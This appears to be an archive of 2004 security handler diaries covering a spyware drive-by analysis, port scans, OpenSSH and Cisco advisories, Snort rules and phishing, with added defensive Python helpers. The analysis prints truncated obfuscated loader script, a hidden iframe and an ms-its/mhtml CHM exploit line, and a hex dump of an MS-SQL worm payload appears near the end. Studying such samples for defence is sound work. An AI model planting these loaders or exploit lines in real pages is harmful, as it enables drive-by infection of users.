Just looking at that list makes me tired. (And the name "ezStD" makes me laugh… For those non-English speakers out there, STD is an acronym for "Sexually Transmitted Disease" :-) I could slog down through the whole sorry mess, and perhaps I will if there is enough interest, but for now let's take a look at another area where Joe is no longer the 0wner of his P.C.: his homepage.

Joe's homepage was changed in the initial "drive-by" to be "http://default-homepage-network.com/start.cgi?new-hkcu". The next time that Joe fires up IE, here’s what he gets (suitably edited to remove superfluous crud):

<title>Default Homepage Network</title>
[script language=javascript]
var agt=navigator.userAgent.toLowerCase();
var is_ie = (agt.indexOf("msie") != -1);
var is_aol = (agt.indexOf("aol") != -1);

if (!is_aol) {
if (!is_aol) {
var expdate = new Date((new Date()).getTime() + 600000);
if (document.cookie.indexOf("delayed") == -1) {
"delayed=general; expires=" + expdate.toGMTString() + "; path=/;";
splashWin2 = window.open("",'y','fullscreen=1,toolbar=0,location=0,\

The referenced file, "newspynotice.html," is another rather interesting little gem. It displays a big red stop sign, and explains that poor Joe’s computer may be infected with spyware. Has Joe noticed that his home page has been changed? (Well, duh!) Has his computer been acting "wierd" lately? (Why can’t these malware clowns spell?) Is the Internet "running slow or crashing?" If so, Joe simply needs to click on a link on the page and his "computer will be back to normal and secure again in just a few minutes." Oh, joy... oh, joy.

But, hidden within the HTML of this "IMPORTANT SECURITY NOTICE!" page is a little surprise:

<!-- 1. newobj1 -->

[script type="text/javascript"]document.write('\u003c\u0073\u0063\u0072\u0069\u0070

<!-- 2. e1 -->

[script type="text/javascript"]document.write('\u003c\u0069\u0066\u0072\u0061\u006d

A little decoding gives us Part 1:

[script language=javascript]
var oPopup = window.createPopup();
function showPopup() {
oPopup.document.body.innerHTML = "<object\

And Part 2:

[iframe src="" width=1 height=1][/iframe]

This recalls the hp2.htm file that was downloaded and installed in Part I of this epic adventure. Same site, same method, same result:

<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->

[script type="text/javascript"]document.write('\u003c\u0074\u0065\u0078\u0074\u0061

Once again, this isn’t difficult to decode, and results in:

<textarea id="code" style="display:none;">
[object data="&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/HP1.CHM::/hp1.htm"\
[script language="javascript"]

Another .chm exploit that will eventually result in the download and execution of a file called hp1.exe.
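
To pull apart pages like newspynotice.html and hp2.htm without rendering them, here is an added Python helper (my example, not the diary's or SmartBot's code). It extracts the document.write() string literals, decodes the \uXXXX escapes and the HTML entities (so "&#109;s-its:" reads as "ms-its:"), and flags the constructs described above: 1x1 iframes, object data= pointing at ms-its:/mhtml:, and createPopup(). The sample page is constructed for the example and uses an RFC 2606 .invalid host.

```python
import re
from html import unescape
from typing import Dict, List

# JavaScript string escapes used by the obfuscated pages: \uXXXX, \xXX and
# the simple single-character escapes.
_JS_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})|\\(.)")
_SIMPLE = {"n": "\n", "t": "\t", "r": "\r"}


def decode_js_string(literal: str) -> str:
    """Turn a JS string literal body such as \\u003c\\u0069 into the text it builds."""
    def repl(m: "re.Match") -> str:
        if m.group(1):
            return chr(int(m.group(1), 16))
        if m.group(2):
            return chr(int(m.group(2), 16))
        return _SIMPLE.get(m.group(3), m.group(3))
    return _JS_ESCAPE.sub(repl, literal)


# document.write('...') or document.write("...") with the literal body captured.
_DOC_WRITE = re.compile(r"""document\.write\(\s*(['"])(.*?)\1\s*\)""", re.S)


def extract_document_writes(page: str) -> List[str]:
    """Decoded markup that each document.write() call would inject into the page."""
    return [decode_js_string(m.group(2)) for m in _DOC_WRITE.finditer(page)]


# Constructs the diary found in the decoded output. Matched after HTML
# entities are resolved, so the "&#109;s-its:" trick does not hide "ms-its:".
_INDICATORS = [
    ("hidden iframe", re.compile(r"<iframe\b[^>]*\b(?:width|height)\s*=\s*['\"]?[01]\b", re.I)),
    ("ms-its/mhtml object", re.compile(r"<object\b[^>]*\bdata\s*=\s*['\"]?[^'\">]*\b(?:ms-its|mhtml):", re.I)),
    ("remote script", re.compile(r"<script\b[^>]*\bsrc\s*=", re.I)),
    ("createPopup", re.compile(r"\bcreatePopup\s*\(", re.I)),
]


def analyze(page: str) -> Dict[str, List[str]]:
    """Map each indicator name to the decoded snippets that triggered it."""
    hits: Dict[str, List[str]] = {}
    for snippet in extract_document_writes(page):
        markup = unescape(snippet)
        for name, pattern in _INDICATORS:
            if pattern.search(markup):
                hits.setdefault(name, []).append(markup)
    return hits


def js_unicode_escape(text: str) -> str:
    """Encode text the way the drive-by pages do (used here only to build the sample)."""
    return "".join(f"\\u{ord(c):04x}" for c in text)


# Constructed sample page for the example; it mirrors the structure of the
# snippets quoted in the diary but is not the real page.
SAMPLE_PAGE = (
    "<!-- 1. newobj1 -->\n"
    "<script type=\"text/javascript\">document.write('"
    + js_unicode_escape("<script language=javascript>var oPopup = window.createPopup();</script>")
    + "')</script>\n"
    "<!-- 2. e1 -->\n"
    "<script type=\"text/javascript\">document.write('"
    + js_unicode_escape('<iframe src="http://example.invalid/hp2.htm" width=1 height=1></iframe>')
    + "')</script>\n"
    "<script type=\"text/javascript\">document.write('"
    + js_unicode_escape('<object data="&#109;s-its:mhtml:file://C:\\foo.mht!${PATH}/HP1.CHM::/hp1.htm"></object>')
    + "')</script>\n"
)

if __name__ == "__main__":
    for name, snippets in analyze(SAMPLE_PAGE).items():
        print(f"[{name}]")
        for s in snippets:
            print("   ", s)
```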

Here we go again... and trust me, hp1.exe is a real piece of work.

Stay tuned for Part III...

Note: When I first started writing this up, I was completely unaware of how deeply down the rabbit hole it would take me. I honestly believed that it would only be a fairly long diary entry... then two fairly long diary entries... and now it is obvious that we’re heading into three parts at the very least. I’ll try to get Part III (and any other remaining posts) up more quickly.

Handler on Duty: Tom Liston ( http://www.labreatechnologies.com )


Published: 2004-08-22

SSH Scanning Resolved; First Things First Guide

SSH Scanning

Joel Esler brought to our attention that a new version of the brutessh code has been posted which appears to match the scanning we have been seeing lately. It appears that we finally have a solution to our mystery. Thanks to all the folks who submitted information, and to everyone whose time and effort went into coming up with a resolution!!

First Things First Guide: An Introduction to Network Security

We have received a lot of questions from folks wanting to learn more about network security and how to get started. Here is a guide that was written to do just that and to hopefully point people in the right direction. If you have any comments that would make it better, please let me know. Here is the link

Lorna J. Hutcheson

Handler on Duty



Published: 2004-08-21

Port 559 and 65506

Port 559

Following the diary from two days ago on port 559, we received some packet captures from Timothy. Part of the log is described as follows:

For every 256 bytes, I always responded with a standard response consisting of 256 bytes. I noticed two patterns: 16, 30, 31, or 39 X 256-byte packets consisting of 00 (this was every ip address but one); and, a 7-byte message consisting of the following (expressed as hexadecimal):
04 01 00 50 D9 6A E8 11

If you see any similarities or differences, do let us know.

Port 65506

We also received a submission that there is a spike on port 65506. Part of the packet capture is as follows:

Type: IP (0x0800)
Trailer: 0000000000
Internet Protocol, Src Addr: xx.xx.146.95 (xx.xx.146.95), Dst Addr: xx.xx.0.31 (xx.xx.0.31)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 41
    Identification: 0xc0ac (49324)
    Flags: 0x04 (Don't Fragment)
        0... = Reserved bit: Not set
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 117
    Protocol: TCP (0x06)
    Header checksum: 0x2211 (correct)
    Source: xx.xx.146.95 (xx.xx.146.95)
    Destination: xx.xx.0.31 (xx.xx.0.31)
Transmission Control Protocol, Src Port: 3769 (3769), Dst Port: 65506 (65506), Seq: 0, Ack: 0, Len: 1
    Source port: 3769 (3769)
    Destination port: 65506 (65506)
    Sequence number: 0 (relative sequence number)
    Next sequence number: 1 (relative sequence number)
    Acknowledgement number: 0 (relative ack number)
    Header length: 20 bytes
    Flags: 0x0010 (ACK)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...1 .... = Acknowledgment: Set
        .... 0... = Push: Not set
        .... .0.. = Reset: Not set
        .... ..0. = Syn: Not set
        .... ...0 = Fin: Not set
    Window size: 16616
    Checksum: 0x483c (correct)
Data (1 byte)
    0000 43

ISC data also shows that there is a huge increase of traffic on this port for the last two days:


One of our handlers, Deb, pointed out that this pattern was seen in Mar and May about the same time each month lasting until around the end of the month:


Could this be the same old bug, scanning for Phatbot SSL Proxy? Let us know if you have further information on this.


Published: 2004-08-20

OpenSSH 3.9 has just been released, Rumors of new Download.Ject Worm, SEC Warning about Telephone Fraud Scam, My Favorite Quote of the Day

OpenSSH 3.9 has just been released. According to the release information, there are several changes since version 3.8.

* Added new "IdentitiesOnly" option to ssh(1), which specifies that it
should use keys specified in ssh_config, rather than any keys in ssh-agent(1)

* Make sshd(8) re-execute itself on accepting a new connection. This
security measure ensures that all execute-time randomisations are
reapplied for each connection rather than once, for the master
process' lifetime. This includes mmap and malloc mappings, shared
library addressing, shared library mapping order, ProPolice and
StackGhost cookies on systems that support such things

* Add strict permission and ownership checks to programs reading
~/.ssh/config NB ssh(1) will now exit instead of trying to process a
config with poor ownership or permissions

* Implemented the ability to pass selected environment variables
between the client and the server. See "AcceptEnv" in sshd_config(5)
and "SendEnv" in ssh_config(5) for details

* Added a "MaxAuthTries" option to sshd(8), allowing control over the
maximum number of authentication attempts permitted per connection

* Added support for cancellation of active remote port forwarding
sessions. This may be performed using the ~C escape character,
see "Escape Characters" in ssh(1) for details

* Many sftp(1) interface improvements, including greatly enhanced "ls"
support and the ability to cancel active transfers using SIGINT (^C)

* Implement session multiplexing: a single ssh(1) connection can now
carry multiple login/command/file transfer sessions. Refer to
the "ControlMaster" and "ControlPath" options in ssh_config(5) for
more information

* The sftp-server has improved support for non-POSIX filesystems (e.g.

* Portable OpenSSH: Re-introduce support for PAM password
authentication, in addition to the keyboard-interactive driver. PAM
password authentication is less flexible, and doesn't support pre-
authentication password expiry but runs in-process so Kerberos
tokens, etc are retained

Thanks to Donald Smith for providing us with the following information overview:

Of these 1,2,3,4 and 10 are all security related. With 1,2,3 and 4 being
issues that were considered by many to be minor security flaws in

Pam was pulled when there were some issues with pam libraries that led
to a potential vulnerability in openssh.

Portable OpenSSH 3.7.1p2 and newer are not vulnerable to "September 23,
2003: Portable OpenSSH Multiple PAM vulnerabilities", OpenSSH Security
Advisory. (This issue does not affect OpenBSD versions)


Rumors of new Download.Ject Worm

We have heard rumors that there may be a new worm on the loose. Reports state that this worm arrives as an innocuous-looking instant message on AIM or ICQ which says "My personal home page http://XXXXXXX.X-XXXXXX.XXX/". Once the user clicks on this link, Internet Explorer opens a malicious website that infects the user through several IE vulnerabilities such as Object Data, Ibiza CHM and MHTML Redirect.

The most noticeable end-user effects of being infected with this new Download.Ject worm are a modified homepage and search pane in the browser. In place of the user's ordinary homepage is a site called TargetSearch, along with several browser windows displaying adult advertisements and referral links. There are obvious financial motivations behind this worm.

Please let the Handler's know if anyone has received an actual copy of this.

SEC Warning about Telephone Fraud Scam

It appears there is yet another scam trying to take our hard-earned dollars from our hands. This time the technology being used to scam is the telephone. According to the Securities and Exchange Commission, the message is designed to sound as if the speaker didn't realize that he or she was leaving the hot tip on the wrong machine. The message is intended to lead you to believe that there is a stock that is going to drastically increase in value and that you could make a huge profit. In reality, the only ones making a huge profit will be the scammers. To read the full story and find out how to report this scam should you receive one of these calls, see the Securities and Exchange Commission web site.


My Favorite Quote of the Day

Thanks to Donald Smith for my favorite quote of the day.

Everyday is virus day.
Do you know where your recovery CDs are?
Did you create them yet?
Deb Hale

Handler On Duty



Published: 2004-08-19

Spyware Tool Kit, OSPF Filtering & Authentication, Port 559 Traffic Spike

Anti-Spyware Tool Kit

Yesterday's diary entry solicited a number of replies regarding the "tool kits" people use for fighting spyware, malware and viruses. I've collated the most popular, from both e-mail submissions and some from the Handlers themselves. This list is not necessarily complete in any way... just a starter for people to help build their own kit.


Spybot - Search & Destroy: http://security.kolla.de/ or http://www.safer-networking.org
Ad-Aware: http://www.lavasoftusa.com/software/adaware/
SwatIt: http://www.swatit.org
TDS-3 - Trojan Defence Suite: http://tds.diamondcs.com.au/
TrojanHunter: http://www.misec.net/trojanhunter
TheCleaner: http://www.moosoft.com/
BHOdemon: http://www.spychecker.com/download/download_bhodaemon.html
SpySweeper: http://www.webroot.com/
Process Explorer: http://www.sysinternals.com/
HijackThis: http://www.spywareinfo.com/~merijn/
AntiVir: http://www.free-av.com/
AVG: http://www.grisoft.com/us/us_index.php


Rogue/Suspect Anti-Spyware Products & Web Sites: http://www.spywarewarrior.com/rogue_anti-spyware.htm
Broadband Reports (aka DSL Reports): http://www.dslreports.com/forum/security,1

Please note, some or all of these tools are NOT for the novice, and should be used with GREAT care. If you are not careful, you may damage parts of your operating system.

OSPF Filtering & Authentication

Yesterday, Cisco released an advisory regarding a vulnerability in their OSPF implementation that could result in a DoS of a router. The notice also provided links to updated software that should resolve the issue. However, there are a number of SOPs (standard operating procedures) that router admins should be following that will also help mitigate this situation. In the case of OSPF, the protocol should be filtered at your borders if possible, running only on "internal" interfaces, and authentication should be required. The following links should get you started:

Cisco Sample Configuration: http://www.cisco.com/warp/public/104/25.shtml
Another Sample Configuration: http://www.tech-recipes.com/cisco_router_tips408.html
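
The three SOPs above in checkable form: an added Python audit (my example, not Cisco's or the ISC's code) that reads an IOS-style config and reports border interfaces that still form adjacencies, OSPF-speaking interfaces without message-digest authentication, and border interfaces with no inbound ACL dropping OSPF. Both configs are constructed for the example with RFC 5737 addresses, assumed interface names and a placeholder key.

```python
import re
from typing import Dict, List, Tuple

# Constructed "before" config: OSPF runs on the uplink, unauthenticated, unfiltered.
WEAK_CONFIG = """\
interface Serial0/0
 description uplink to ISP (border)
 ip address 203.0.113.2 255.255.255.252
!
interface FastEthernet0/0
 description internal LAN
 ip address 10.1.1.1 255.255.255.0
!
router ospf 1
 network 10.1.1.0 0.0.0.255 area 0
 network 203.0.113.0 0.0.0.3 area 0
"""

# Constructed "after" config: passive by default, MD5 on the internal link,
# OSPF (IP protocol 89) dropped inbound on the border. Key is a placeholder.
HARDENED_CONFIG = """\
interface Serial0/0
 description uplink to ISP (border)
 ip address 203.0.113.2 255.255.255.252
 ip access-group BORDER-IN in
!
interface FastEthernet0/0
 description internal LAN
 ip address 10.1.1.1 255.255.255.0
 ip ospf message-digest-key 1 md5 <REPLACE-WITH-SECRET>
!
router ospf 1
 passive-interface default
 no passive-interface FastEthernet0/0
 network 10.1.1.0 0.0.0.255 area 0
 area 0 authentication message-digest
!
ip access-list extended BORDER-IN
 deny ospf any any log
 permit ip any any
"""


def parse_stanzas(cfg: str) -> List[Tuple[str, List[str]]]:
    """Split an IOS-style config into (header line, indented body lines) stanzas."""
    stanzas: List[Tuple[str, List[str]]] = []
    header, body = None, []
    for raw in cfg.splitlines():
        if not raw.strip() or raw.strip() == "!":
            continue
        if raw.startswith(" ") and header is not None:
            body.append(raw.strip())
        else:
            if header is not None:
                stanzas.append((header, body))
            header, body = raw.strip(), []
    if header is not None:
        stanzas.append((header, body))
    return stanzas


def audit_ospf(cfg: str, border_ifaces: List[str]) -> List[str]:
    """Findings against the SOPs: passive on the border, MD5 where OSPF runs, OSPF filtered at the edge."""
    stanzas = parse_stanzas(cfg)
    ifaces: Dict[str, List[str]] = {h.split(" ", 1)[1]: b for h, b in stanzas if h.startswith("interface ")}
    acls: Dict[str, List[str]] = {h.split()[-1]: b for h, b in stanzas if h.startswith("ip access-list ")}
    ospf = [b for h, b in stanzas if h.startswith("router ospf")]
    if not ospf:
        return ["no OSPF process configured"]
    body = ospf[0]
    findings: List[str] = []

    # 1. Which interfaces may still form adjacencies?
    passive_default = "passive-interface default" in body
    explicit_passive = {l.split(" ", 1)[1] for l in body
                        if l.startswith("passive-interface ") and l != "passive-interface default"}
    explicit_active = {l.split(" ", 2)[2] for l in body if l.startswith("no passive-interface ")}
    active = explicit_active if passive_default else set(ifaces) - explicit_passive
    for name in sorted(active & set(border_ifaces)):
        findings.append(f"{name}: OSPF active on a border interface; make it passive")

    # 2. Authentication on every interface that still speaks OSPF
    area_md5 = any(re.match(r"area \S+ authentication message-digest$", l) for l in body)
    for name in sorted(active):
        ibody = ifaces.get(name, [])
        if not (area_md5 or "ip ospf authentication message-digest" in ibody):
            findings.append(f"{name}: OSPF without message-digest authentication")
        elif not any(l.startswith("ip ospf message-digest-key ") for l in ibody):
            findings.append(f"{name}: message-digest authentication enabled but no key set")

    # 3. Inbound filter dropping OSPF on each border interface
    for name in border_ifaces:
        acl_name = None
        for l in ifaces.get(name, []):
            m = re.match(r"ip access-group (\S+) in$", l)
            if m:
                acl_name = m.group(1)
        rules = acls.get(acl_name, []) if acl_name else []
        if not any(re.match(r"deny (ospf|89)\b", l) for l in rules):
            findings.append(f"{name}: no inbound ACL dropping OSPF at the border")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_ospf(cfg, ["Serial0/0"]) or ["ok"])
```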

Port 559 Scanning, Request for Packets

We have noted a marked increase in Port 559 scanning. This port may be related to the Domwis backdoor. Please submit any packet captures for this port to http://isc.sans.org/contact.php

More information here:


Handler-on-Duty: Dave Brookshire <dsb AT rlx DOT com>


Published: 2004-08-18

Updated Acrobat Snort Sig / Cisco Advisory / Distributed Vulnerable Scripts Scans/ Diary Foot-note

Acrobat Snort Sig

We received a note that BleedingSnort posted a Snort sig for the acrobat vulnerability:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE Adobe Acrobat Reader Malicious URL Null Byte"; reference:url,idefense.com/application/poi/display?id=126&type=vulnerabilities; uricontent:".pdf%00"; classtype:attempted-admin; sid:2002001; rev:2;)


Please use the following rule for the Adobe Acrobat Vulnerability:

(msg:"BLEEDING-EDGE Adobe Acrobat Reader Malicious URL Null Byte";
flow:to_server,established; uricontent:".pdf|00|"; nocase;
reference:cve,2004-0629; classtype:web-application-attack; sid:2002001;
Reference and Updates at: http://www.bleedingsnort.com
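
To see why the rule was revised from uricontent:".pdf%00" to uricontent:".pdf|00|" with nocase, here is an added Python check (my example, not BleedingSnort's code) that applies both forms to constructed request lines, assuming, as Snort does for uricontent, that the match runs against the percent-decoded URI.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# The updated signature's uricontent:".pdf|00|" with nocase, expressed as a
# regex over the decoded URI: ".pdf" immediately followed by a literal NUL.
PDF_NUL = re.compile(r"\.pdf\x00", re.I)

# The rev:2 form, uricontent:".pdf%00" without nocase: a literal match on the
# still percent-encoded request text.
RAW_PDF_NUL = re.compile(r"\.pdf%00")


def request_uri(line: str) -> str:
    """URI from a request line such as 'GET /docs/x.pdf HTTP/1.0'."""
    parts = line.split(" ", 2)
    return parts[1] if len(parts) >= 2 else ""


def normalize_uri(uri: str) -> str:
    """Single-pass percent decoding, byte for byte (latin-1 keeps %00 as one NUL char)."""
    return unquote(uri, encoding="latin-1", errors="replace")


def matches_updated_rule(line: str) -> bool:
    return bool(PDF_NUL.search(normalize_uri(request_uri(line))))


def matches_raw_rule(line: str) -> bool:
    return bool(RAW_PDF_NUL.search(request_uri(line)))


# Constructed request lines for the example.
SAMPLE_REQUESTS = [
    "GET /docs/report.pdf HTTP/1.0",          # benign
    "GET /docs/report.pdf%00.html HTTP/1.0",  # encoded NUL right after .pdf
    "GET /docs/REPORT.PDF%00 HTTP/1.0",       # same, upper case: needs nocase
    "GET /docs/report%2Epdf%00 HTTP/1.0",     # dot percent-encoded: needs decoded match
    "GET /docs/report.pdf%2500 HTTP/1.0",     # double-encoded: decodes to "%00", not a NUL
]


def classify(lines: List[str]) -> List[Tuple[str, bool, bool]]:
    """(line, rev:2 raw-text hit, updated decoded-NUL hit) for each request line."""
    return [(l, matches_raw_rule(l), matches_updated_rule(l)) for l in lines]


if __name__ == "__main__":
    for line, raw_hit, new_hit in classify(SAMPLE_REQUESTS):
        print(f"raw={raw_hit!s:5} updated={new_hit!s:5} {line}")
```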

Cisco Security Advisory: Cisco IOS Malformed OSPF Packet Causes Reload

Cisco just released a Security Advisory about a possible DoS condition in Cisco devices that have OSPF enabled.
According to Cisco:

"A Cisco device running Internetwork Operating System (IOS) ® and enabled for the Open Shortest Path First (OSPF) protocol is vulnerable to a Denial of Service (DoS) attack from a malformed OSPF packet. The OSPF protocol is not enabled by default.

The vulnerability is only present in Cisco IOS release trains based on 12.0S, 12.2, and 12.3. Releases based on 12.0, 12.1 mainlines, and all Cisco IOS images prior to 12.0 are not affected.

Cisco has made free software available to address this vulnerability.

There are workarounds available to mitigate the effects."


More distributed Scans

We received more logs from what looks like a distributed scan for vulnerable scripts.

You can find an excerpt below:

[Mon Aug 16 07:05:40 2004] [error] [client] script not found or unable to stat: /yyyyyy/xxxxx/public_html/mail.cgi

[Mon Aug 16 07:05:39 2004] [error] [client] script not found or unable to stat: /yyyyyy/xxxxx/public_html/cgi-bin/FormMail.pl

[Mon Aug 16 07:05:34 2004] [error] [client] script not found or unable to stat: /yyyyyy/xxxxx/public_html/cgi-bin/formmail.cgi

[Mon Aug 16 07:05:23 2004] [error] [client] script not found or unable to stat: /yyyyyy/xxxxx/public_html/cgi-bin/mailform.pl

[Mon Aug 16 07:05:20 2004] [error] [client] script not found or unable to stat: /yyyyyy/xxxxx/public_html/cgi-bin/contact.cgi

[Mon Aug 16 07:05:19 2004] [error] [client] script not found or unable to stat: /yyyyyy/xxxxx/public_html/cgi-bin/formmail.pl

Diary foot-note

If you have ever had problems with spyware and the like, be careful when choosing the right tools. The worst part is that if you have spyware on your computer, a lot of pop-ups offering "anti-spyware" products will appear in your window. Be very, very careful...!

I usually have a set of tools that I trust to clean up a computer, as many of you do. So, if you are in doubt, drop us a line.


Olympic games 2004 status: Brazil - 2 bronze medals

Handler on Duty: Pedro Bueno (bueno/AT/ieee.org)


Published: 2004-08-17

Acrobat Reader Vulnerabilities - FreeBSD Security Benchmark - Phishing Season

Acrobat Reader Buffer Overflows - Linux/Windows command execution

iDEFENSE has released two advisories regarding vulnerabilities in Adobe's Acrobat Reader software. The first is in the Acrobat Reader for UNIX systems, and allows arbitrary code execution via a buffer overflow in the handling of uuencoded documents.


The second is a buffer overflow in the ActiveX component of Acrobat Reader for Windows. This vulnerability poses a much greater threat, for a number of reasons. First, according to iDEFENSE, the overflow is still present in current releases of Acrobat Reader. Secondly, the number of target systems is much greater than for the UNIX Acrobat Reader vulnerability. Finally, and most importantly, the advisory contains what is essentially a roadmap for any would-be exploit developer.


FreeBSD Security Benchmark

CIS has released a benchmark for the FreeBSD operating systems, which is, according to the site, "intended for FreeBSD versions 4.8 and later." I believe this means FreeBSD 4.8-4.10 (Production) and does *NOT* include the 5.x series, which is still currently a "new technology release."


UPDATE: Mark your calendars, true believers. I was wrong! According to CISecurity's John Banghart, the benchmark has been tested on FreeBSD 4.8 and 5.2.

Phishing Season

ISC reader Brandon Noble sent in the following:

"Quite a few people think they could NEVER get caught in one of these phishing scams. The truth is that the social engineering is very good.

Some of your readers may benefit from this little phishing test from Mail Frontier."


I took the test myself, and found it to be a fairly accurate sampling of common purely email-based phishing lures found in the wild - however, keep in mind that the quiz is the product of an anti-phishing product. Unfortunately, phishermen (phisherpersons?) are upping the ante, and using browser-specific spoofing vulnerabilities to increase the apparent authenticity* of their schemes. On that note, the prolific Liu Die Yu has discovered Yet Another Internet Explorer Spoofing Vulnerability. The gory details (and a proof of concept test) are available at the URL below.


In a discussion of anti-spoofing capabilities on the ISC mailing list, handler George Bakos pointed out the free anti-spoofing tool Spoofstick. Spoofstick is a browser extension for IE and Firefox that simply displays the current domain name. This is a simple yet elegant solution to many of the spoofing attacks currently employed by phishing sites. For more information (and to download the Spoofstick) head to the following URL.


UPDATE: Several ISC readers have noted that SpoofStick currently fails to display the correct domain for the most recent IE spoofing attack as implemented in the aforementioned Secunia proof-of-concept. I am in contact with Corestreet in an attempt to rectify this.

UPDATE: Within two hours of contacting Corestreet the ISC received the following communication from Phil Libin, Corestreet's president:

SpoofStick for IE v. 1.02 (available from our website as of about an hour
ago) fixes exactly this bug.

Cory Altheide



*I was going to say "decrease the phishiness" instead of "increase the apparent authenticity" but I'm willing to bet that ISC's audience had pretty much had their fill of cute perversions of "phishing" by the middle of the paragraph in question.


Published: 2004-08-16

Still More MyDoom, a Few Twists on IDS, and a New Phishing Threat

Today's Highlights -

- Mydoom.s, yet another MyDoom variant

- Virus detection with Snort

- Switch Port Monitoring

- A New Twist to Phishing Reported

Mydoom.s, yet another MyDoom variant

Conrad Longmore brought to our attention that there's yet another new MyDoom variant.
The MyDoom variant "MyDoom.S" is being spread en masse this Monday. It has been suggested that it is being spread using a bot network created by the previous variant of the MyDoom worm.

The attachment seems to be named "photos_arc.exe".

- update your favorite anti-virus package

- educate your users not to click on attachments

Some URLs:


[by Swa Frantzen, standing in for George]

Mydoom.s detection with Snort

For those feeling brave, there are bleeding edge Snort rules available to detect this latest variant at: http://www.bleedingsnort.com/cgi-bin/viewcvs.cgi/Stable/WORM_MyDoom.S?rev=1.2&content-type=text/vnd.viewcvs-markup
Thanks to Matt Jonkman for submitting that.

Speaking of Snort, viruses (virii?), and bleeding edge - Will Metcalf has put together a ClamAV preprocessor module for Snort, to alert on network traffic containing code that fires a Clam virus signature:

Switch Port Monitoring

A couple of days ago, I advised someone to monitor switch port activity for indications of unusual activity. For example, seeing a higher than usual frames-per-second count from a host during the wee hours may indicate a host is scanning or serving files. An unusually high number heading to a host may indicate a sniffer, etc. Andy Cuff of Talisker has put together a nice list of config settings for popular switches to make this a little easier:

A New Twist to Phishing Reported

Dan Hubbard of Websense has reported a new trend in phishing:

We are starting to see more and more phishing sites which are not targeting specific financial institutes but are targeting general ecommerce. We have seen "fake" online banks, sporting good stores, and pharmacies.


* no contact information

* no domain name

* many hosted in China or S Korea.

* no secure ordering process

* reported by thousands of spam engines

Report any phishing attempts you receive to:

Constant vigilance!

--Alastor Moody, Harry Potter and the Goblet of Fire


Published: 2004-08-14

New Ethereal released; A different Kind of Storm Center

New Ethereal released

The new Ethereal now supports X.509 protocols; there are no security fixes in this release.

Packetyzer was also updated recently. It supports Ethereal's packet capture format and offers a bit more support for wireless captures. The extra feature that sets Packetyzer apart from Ethereal is its playback function: you can edit a captured packet and then replay it on the wire. The TCP flow view option is particularly helpful in illustrating how protocols work.

A different Kind of Storm Center

The SANS Internet Storm Center sticker is proudly displayed on my cube at the office. I place threat announcements that affect the general user at the office. The other column has the American Red Cross’ daily disaster report (when not keeping an eye on the Internet, I play disaster responder with the ARC.) This week is a rather busy week for the ARC so my cube is covered with satellite photos and storm path predictions of Bonnie and Charlie. So many graphics that they’ve pushed out the regular ISC announcements, and now the Internet Storm Center sign is taking on double duties.
It’s rare that we get the request on the handlers list, but for those of you looking for Meteorological data and analysis I offer these links:

The Hurricane Watch Net:

Reports of current storm activity in the United States:

Output from the Storm Prediction Center, again for the United States:

Kevin Liston
kliston at greenman-consulting dot com


Published: 2004-08-13

GAIM buffer overflow, Aitel paper and more XP SP2

Gaim Unspecified MSN Protocol Buffer Overflow Vulnerabilities

Multiple Linux distributions released an update for GAIM, an instant messenger suite, to fix a buffer overflow in the MSN IM protocol handler. While we haven't seen this vulnerability being exploited in the wild, this appears to be an interesting trend for a research project.

The concept of 'honey sticks' or similar has been tossed around on mailing lists for a while. Take a vulnerable client (MS IE, or GAIM, or a vulnerable IRC client) and connect to multiple sites to see if they compromise the machine through client access. I heard of a University research project where they were taking snapshots of Windows 2000 boxes with vulnerable Internet Explorer browsers and connecting to thousands of sites polled from search engines and phishing scams. It should be quite interesting to see the fruits of these research projects.

XP Service Pack 2 continues to provide fodder for all sides (pro and con).

On one side, we feel that as a whole it provides better security (personal firewall turned on by default, end of support for most named raw sockets, etc.), and on the other we have heard of many ill effects of SP2.

Johannes put up a page summarizing the initial experience with XP SP2. This can be found here:


Dave Aitel, from Immunitysec just published a research paper titled: "Microsoft Windows, a lower Total Cost of Ownership" located at:


Note that it is 0wnership with a Zero in the above title. The paper is sure to stir up the waters a tad.

Scanning trends continue with 445 leading the pack. There have been a number of attacks against MS-SQL resurfacing; one example from earlier this evening is posted below. These are old exploits, old vulnerabilities, and machines that have been 0wn3ed for quite some time. DBAs, patch thy systems!


21:39:30.585849 > foo.foo.foo.104.1434: [udp sum ok] udp 376
(ttl 112, id 18373, len 404)
0x0000 4500 0194 47c5 0000 7011 1d05 3d17 3f69 E...G...p...=.?i
0x0010 xxxx xx68 04a1 059a 0180 4c1b 0401 0101 B.%h......L.....
0x0020 0101 0101 0101 0101 0101 0101 0101 0101 ................
0x0030 0101 0101 0101 0101 0101 0101 0101 0101 ................
0x0040 0101 0101 0101 0101 0101 0101 0101 0101 ................
0x0050 0101 0101 0101 0101 0101 0101 0101 0101 ................
0x0060 0101 0101 0101 0101 0101 0101 0101 0101 ................
0x0070 0101 0101 0101 0101 0101 0101 01dc c9b0 ................
0x0080 42eb 0e01 0101 0101 0101 70ae 4201 70ae B.........p.B.p.
0x0090 4290 9090 9090 9090 9068 dcc9 b042 b801 B........h...B..
0x00a0 0101 0131 c9b1 1850 e2fd 3501 0101 0550 ...1...P..5....P
0x00b0 89e5 5168 2e64 6c6c 6865 6c33 3268 6b65 ..Qh.dllhel32hke
0x00c0 726e 5168 6f75 6e74 6869 636b 4368 4765 rnQhounthickChGe
0x00d0 7454 66b9 6c6c 5168 3332 2e64 6877 7332 tTf.llQh32.dhws2
0x00e0 5f66 b965 7451 6873 6f63 6b66 b974 6f51 _f.etQhsockf.toQ
